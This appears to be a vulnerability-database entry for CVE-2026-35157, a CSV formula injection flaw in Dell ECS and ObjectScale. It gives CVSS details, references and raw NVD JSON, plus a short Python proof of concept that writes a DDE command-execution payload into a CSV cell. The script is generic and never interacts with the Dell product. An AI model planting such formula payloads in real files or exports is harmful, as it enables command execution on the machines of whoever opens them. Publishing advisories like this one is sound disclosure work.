CVE-2026-35157

Description

Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains an improper neutralization of formula elements in a CSV File vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dell ECS 3.8.1.0 - 3.8.1.7

Dell ObjectScale < 4.3.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Example: CSV Injection Payload Generation
# Target: Dell ECS / ObjectScale UI

import csv

def generate_malicious_csv(filename):
    # Malicious payload to execute calc.exe on Windows when opened in Excel
    # Attackers can replace this with downloading a shell, etc.
    payload = '=cmd|\' /C calc\'!A0'
    
    # Simulating data that might be injected via the UI (e.g., Username, Object Name)
    data = [
        ['ID', 'UserName', 'Description'],
        ['1', 'admin', 'Normal User'],
        ['2', payload, 'Injected Payload']
    ]
    
    with open(filename, 'w', newline='', encoding='utf-8') as file:
        writer = csv.writer(file)
        writer.writerows(data)
    
    print(f"[+] Generated malicious CSV file: {filename}")
    print(f"[+] Payload injected: {payload}")

if __name__ == "__main__":
    generate_malicious_csv("exploit.csv")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35157
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35157
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35157/
[4] VulDB https://vuldb.com/cve/CVE-2026-35157
[5] https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35157", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:13.490", "lastModified": "2026-05-11T10:16:13.490", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell ECS versions 3.8.1.0 through 3.8.1.7 and Dell ObjectScale versions prior to 4.3.0.0, contains an improper neutralization of formula elements in a CSV File vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000462117/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities-1", "source": "[email protected]"}]}}